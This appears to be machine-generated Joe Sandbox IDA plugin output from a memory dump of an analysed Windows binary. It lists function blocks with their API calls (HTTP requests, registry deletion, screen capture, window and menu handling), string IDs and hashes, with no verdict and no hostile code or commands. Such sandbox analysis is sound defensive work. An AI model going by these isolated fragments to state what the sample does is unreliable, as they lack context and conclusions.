                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                            • API String ID: 36266755-4108050209
                                                                                                                                                                                                                                                                            • Opcode ID: 627ed637df0b795233fefad2e5f3698af270bb24cacab7985d5a280ef3b78d98
                                                                                                                                                                                                                                                                            • Instruction ID: 8a52f55d77856c5620580141ec4c104b18ca869342688d46c6b24a7e1db3779a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 627ed637df0b795233fefad2e5f3698af270bb24cacab7985d5a280ef3b78d98
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 39715A70A04305BFEB209F68DC89FAABFA5FF04764F100256F624A61E0C775AE54DB54
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(00000000,?), ref: 00C87823
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF8577: _wcslen.LIBCMT ref: 00BF858A
                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00C87897
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00C878B9
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C878CC
                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 00C878ED
                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00BF0000,00000000), ref: 00C8791C
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C87935
                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00C8794E
                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 00C87955
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00C8796D
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00C87985
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF2234: GetWindowLongW.USER32(?,000000EB), ref: 00BF2242
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                                                                                                                                                                            • String ID: 0$tooltips_class32
                                                                                                                                                                                                                                                                            • API String ID: 2429346358-3619404913
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00BF24B0
                                                                                                                                                                                                                                                                            • DragQueryPoint.SHELL32(?,?), ref: 00C89BA3
                                                                                                                                                                                                                                                                              • Part of subcall function 00C880AE: ClientToScreen.USER32(?,?), ref: 00C880D4
                                                                                                                                                                                                                                                                              • Part of subcall function 00C880AE: GetWindowRect.USER32(?,?), ref: 00C8814A
                                                                                                                                                                                                                                                                              • Part of subcall function 00C880AE: PtInRect.USER32(?,?,?), ref: 00C8815A
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00C89C0C
                                                                                                                                                                                                                                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00C89C17
                                                                                                                                                                                                                                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00C89C3A
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00C89C81
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00C89C9A
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 00C89CB1
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 00C89CD3
                                                                                                                                                                                                                                                                            • DragFinish.SHELL32(?), ref: 00C89CDA
                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00C89DCD
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                                                                                                                                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                                                                                                                                            • API String ID: 221274066-3440237614
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C6CEF5
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00C6CF08
                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00C6CF1C
                                                                                                                                                                                                                                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00C6CF35
                                                                                                                                                                                                                                                                            • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00C6CF78
                                                                                                                                                                                                                                                                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00C6CF8E
                                                                                                                                                                                                                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C6CF99
                                                                                                                                                                                                                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C6CFC9
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00C6D021
                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00C6D035
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00C6D040
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3800310941-3916222277
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00C866D6,?,?), ref: 00C88FEE
                                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00C866D6,?,?,00000000,?), ref: 00C88FFE
                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00C866D6,?,?,00000000,?), ref: 00C89009
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00C866D6,?,?,00000000,?), ref: 00C89016
                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00C89024
                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00C866D6,?,?,00000000,?), ref: 00C89033
                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00C8903C
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00C866D6,?,?,00000000,?), ref: 00C89043
                                                                                                                                                                                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00C866D6,?,?,00000000,?), ref: 00C89054
                                                                                                                                                                                                                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00C90C04,?), ref: 00C8906D
                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00C8907D
                                                                                                                                                                                                                                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 00C8909D
                                                                                                                                                                                                                                                                            • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 00C890CD
                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00C890F5
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00C8910B
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3840717409-0
                                                                                                                                                                                                                                                                            • Opcode ID: ea9110f143b914ecad9316659bad7411f4d4d41abe750c7531353c980682d1f1
                                                                                                                                                                                                                                                                            • Instruction ID: b34e19b72d865a470523872ac0af35071e33daa87134798295ba727e0d82f130
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ea9110f143b914ecad9316659bad7411f4d4d41abe750c7531353c980682d1f1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 26412775600209BFDB11AF65DC88FAE7BB8EF89725F144058F916D72A0D7309E41DB24
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BFB329: _wcslen.LIBCMT ref: 00BFB333
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C7C10E,?,?), ref: 00C7D415
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7D3F8: _wcslen.LIBCMT ref: 00C7D451
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7D3F8: _wcslen.LIBCMT ref: 00C7D4C8
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7D3F8: _wcslen.LIBCMT ref: 00C7D4FE
                                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C7C154
                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C7C1D2
                                                                                                                                                                                                                                                                            • RegDeleteValueW.ADVAPI32(?,?), ref: 00C7C26A
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00C7C2DE
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00C7C2FC
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00C7C352
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C7C364
                                                                                                                                                                                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00C7C382
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00C7C3E3
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00C7C3F4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                                                                                                                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                            • API String ID: 146587525-4033151799
                                                                                                                                                                                                                                                                            • Opcode ID: 59562e92073dad8b957076897c4013118108f5b7dfd4737e687520f4e142e927
                                                                                                                                                                                                                                                                            • Instruction ID: 103fc956c4ce5228db75d6c2d9c795fd86e98b29122f9ac4cad41253aa38c39e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 59562e92073dad8b957076897c4013118108f5b7dfd4737e687520f4e142e927
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6EC17B35204202AFD710DF24C4D5F6ABBE5BF84318F54C49CE56A8B2A2CB75ED46CB92
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00C73035
                                                                                                                                                                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00C73045
                                                                                                                                                                                                                                                                            • CreateCompatibleDC.GDI32(?), ref: 00C73051
                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00C7305E
                                                                                                                                                                                                                                                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00C730CA
                                                                                                                                                                                                                                                                            • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00C73109
                                                                                                                                                                                                                                                                            • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00C7312D
                                                                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 00C73135
                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00C7313E
                                                                                                                                                                                                                                                                            • DeleteDC.GDI32(?), ref: 00C73145
                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,?), ref: 00C73150
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                                                                                                                            • String ID: (
                                                                                                                                                                                                                                                                            • API String ID: 2598888154-3887548279
                                                                                                                                                                                                                                                                            • Opcode ID: e2e3929b277b99adc6c8c5b94a2915db6ee766ae3dda407004b2cab9206b68b2
                                                                                                                                                                                                                                                                            • Instruction ID: 0de7e4b692f5adce5d9de1ac65386fcd039b07a48fffccd6bf3d53026b44f68c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e2e3929b277b99adc6c8c5b94a2915db6ee766ae3dda407004b2cab9206b68b2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 19610375D00219EFCF04CFA4D884EAEBBB6FF48310F20841AE55AA7250D771AA41DF94
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00BF24B0
                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(0000000F), ref: 00C8A990
                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000011), ref: 00C8A9A7
                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 00C8A9B3
                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(0000000F), ref: 00C8A9C9
                                                                                                                                                                                                                                                                            • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 00C8AC15
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00C8AC33
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00C8AC54
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000003,00000000), ref: 00C8AC73
                                                                                                                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00C8AC95
                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000005,?), ref: 00C8ACBB
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                                                                            • API String ID: 3962739598-2766056989
                                                                                                                                                                                                                                                                            • Opcode ID: 72db8d10d20f5ada6ffc3800d72e978cedec1e3366c0c200902a37ff324befec
                                                                                                                                                                                                                                                                            • Instruction ID: 86f9637c3ea184e3da2dc53ee965e9975a59c3d5fde3b8e1ae80e13ff52382a0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 72db8d10d20f5ada6ffc3800d72e978cedec1e3366c0c200902a37ff324befec
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C3B1CC70600219EFEF14DF69C984BBE3BF2BF44708F04806AEC559B295D771AA80CB55
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00C552E6
                                                                                                                                                                                                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00C55328
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C55339
                                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(?,00000000), ref: 00C55345
                                                                                                                                                                                                                                                                            • _wcsstr.LIBVCRUNTIME ref: 00C5537A
                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00C553B2
                                                                                                                                                                                                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00C553EB
                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00C55445
                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00C55477
                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00C554EF
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                                                                                                                                                                            • String ID: ThumbnailClass
                                                                                                                                                                                                                                                                            • API String ID: 1311036022-1241985126
                                                                                                                                                                                                                                                                            • Opcode ID: 64ab1e396420f2d6fa50910d85925b1ec9d3a7beb67740e17d6a8defa2b5af17
                                                                                                                                                                                                                                                                            • Instruction ID: 0e0fee53a5b36fe1669d94e263458a5b6c97c627f950c624e83f370e66c77c8f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 64ab1e396420f2d6fa50910d85925b1ec9d3a7beb67740e17d6a8defa2b5af17
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0091F879104B06AFD704CF24C8A4BAAB7B9FF41341F404519FE9A82191EB31EED9CB95
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00BF24B0
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00C897B6
                                                                                                                                                                                                                                                                            • GetFocus.USER32 ref: 00C897C6
                                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32(00000000), ref: 00C897D1
                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00C89879
                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00C8992B
                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(?), ref: 00C89948
                                                                                                                                                                                                                                                                            • GetMenuItemID.USER32(?,00000000), ref: 00C89958
                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00C8998A
                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00C899CC
                                                                                                                                                                                                                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C899FD
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                            • API String ID: 1026556194-4108050209
                                                                                                                                                                                                                                                                            • Opcode ID: d6052063b6e802b613bd093a8b9ad710f9a632a4aa27d8c166226bc678201142
                                                                                                                                                                                                                                                                            • Instruction ID: e7a302b648ed56c4f639e135fe5e87fc287653fd22b815f0a0a48afe227724dd
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d6052063b6e802b613bd093a8b9ad710f9a632a4aa27d8c166226bc678201142
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA81C171504301AFD710EF25C884ABB7BE8FB89318F18092DF99597291DB70DA05DBA9
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(00CC29C0,000000FF,00000000,00000030), ref: 00C5C973
                                                                                                                                                                                                                                                                            • SetMenuItemInfoW.USER32(00CC29C0,00000004,00000000,00000030), ref: 00C5C9A8
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000001F4), ref: 00C5C9BA
                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(?), ref: 00C5CA00
                                                                                                                                                                                                                                                                            • GetMenuItemID.USER32(?,00000000), ref: 00C5CA1D
                                                                                                                                                                                                                                                                            • GetMenuItemID.USER32(?,-00000001), ref: 00C5CA49
                                                                                                                                                                                                                                                                            • GetMenuItemID.USER32(?,?), ref: 00C5CA90
                                                                                                                                                                                                                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C5CAD6
                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C5CAEB
                                                                                                                                                                                                                                                                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C5CB0C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                            • API String ID: 1460738036-4108050209
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00C5E4D4
                                                                                                                                                                                                                                                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00C5E4FA
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C5E504
                                                                                                                                                                                                                                                                            • _wcsstr.LIBVCRUNTIME ref: 00C5E554
                                                                                                                                                                                                                                                                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00C5E570
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                                                                                                                                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                                                                                                                            • API String ID: 1939486746-1459072770
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00C7D6C4
                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00C7D6ED
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00C7D7A8
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7D694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00C7D70A
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7D694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00C7D71D
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7D694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C7D72F
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7D694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00C7D765
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7D694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00C7D788
                                                                                                                                                                                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00C7D753
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                                                                                                                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                            • API String ID: 2734957052-4033151799
                                                                                                                                                                                                                                                                            APIs
